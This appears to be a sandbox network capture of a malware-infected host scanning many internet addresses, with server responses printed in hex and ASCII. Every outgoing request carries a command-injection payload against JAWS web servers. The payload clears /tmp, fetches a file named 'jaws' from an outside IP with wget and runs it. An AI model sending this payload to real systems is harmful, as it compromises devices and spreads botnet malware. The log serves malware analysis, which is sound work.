                                                          Jan 2, 2024 06:24:45.761837959 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                          Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to 167.211.72.148.host.secureserver.net's <a href="ma
                                                          Jan 2, 2024 06:24:45.761850119 CET368INData Raw: 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74
                                                          Data Ascii: =cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="c


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          334192.168.2.234079045.32.70.4580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:45.911026001 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:46.062536955 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:45 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          335192.168.2.233451838.173.142.9980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:45.911156893 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:46.062711000 CET502INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:57 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          336192.168.2.235452035.209.88.19080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:45.913930893 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:46.068521976 CET306INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:45 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 82
                                                          Connection: close
                                                          ETag: "655b1984-52"
                                                          Remote-Addr: 212.102.41.2
                                                          X-Default-Vhost: 1
                                                          Data Raw: 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 20 7c 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 0a
                                                          Data Ascii: 400 - Bad Request | Your browser sent a request this server could not understand.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          337192.168.2.234429073.116.187.14580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:46.089607954 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          338192.168.2.233743852.208.51.24280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:46.160934925 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:46.410908937 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:46 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          339192.168.2.234831459.151.128.1780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:46.386584044 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:46.711704016 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:46 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:46 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 34 32 36 37 33 36 38 26 23 34 36 3b 31 37 30 34 31 37 33 30 38 36 26 23 34 36 3b 32 39 62 38 30 65 32 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;74267368&#46;1704173086&#46;29b80e24</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          340192.168.2.2350004104.27.61.23680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:48.847611904 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          341192.168.2.235489474.48.170.2680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:48.887995005 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:49.050178051 CET502INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Mon, 01 Jan 2024 21:15:12 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          342192.168.2.2355632209.235.140.22480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:48.911366940 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:49.076574087 CET148INHTTP/1.0 302 Moved Temporarily
                                                          Location: https:///shell?cd+/tmp;rm+-rf+*;wget+
                                                          Server: BigIP
                                                          Connection: close
                                                          Content-Length: 0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          343192.168.2.234903246.175.16.20680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:48.996752024 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:49.267693043 CET497INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:49 GMT
                                                          Server: Apache/2.4.25 (Debian)
                                                          Content-Length: 303
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 6e 61 73 32 2e 69 6d 63 2e 75 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.25 (Debian) Server at nas2.imc.ua Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          344192.168.2.2356728197.26.81.380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:49.038851023 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          345192.168.2.2337540185.214.242.16280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:49.039118052 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          346192.168.2.2346672194.29.100.3780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:49.045137882 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:49.344347954 CET115INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                          Data Ascii: 400 Bad Request


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          347192.168.2.2332982124.160.184.25480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:49.075743914 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          348192.168.2.234918818.139.66.24980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:49.080775976 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:49.415397882 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:49 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          349192.168.2.234609864.120.69.4980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:49.087898970 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:49.264631033 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:49 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          350192.168.2.2357992160.242.101.24980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:49.569096088 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:49.940783024 CET468INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.14.0 (Ubuntu)
                                                          Date: Tue, 02 Jan 2024 05:24:49 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 194
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          351192.168.2.234962074.48.45.14680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:50.099123955 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:50.258147001 CET336INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.14.2
                                                          Date: Tue, 02 Jan 2024 05:24:50 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 169
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          352192.168.2.2335656104.86.91.9080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:50.099509954 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:50.258171082 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:50 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:50 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 34 66 34 64 35 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 39 30 26 23 34 36 3b 35 37 64 38 65 62 66 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;a4f4d517&#46;1704173090&#46;57d8ebf3</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          353192.168.2.2359748154.204.118.16180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:50.106168032 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          354192.168.2.2356696121.11.37.23480
                                                          TimestampBytes transferredDirectionData
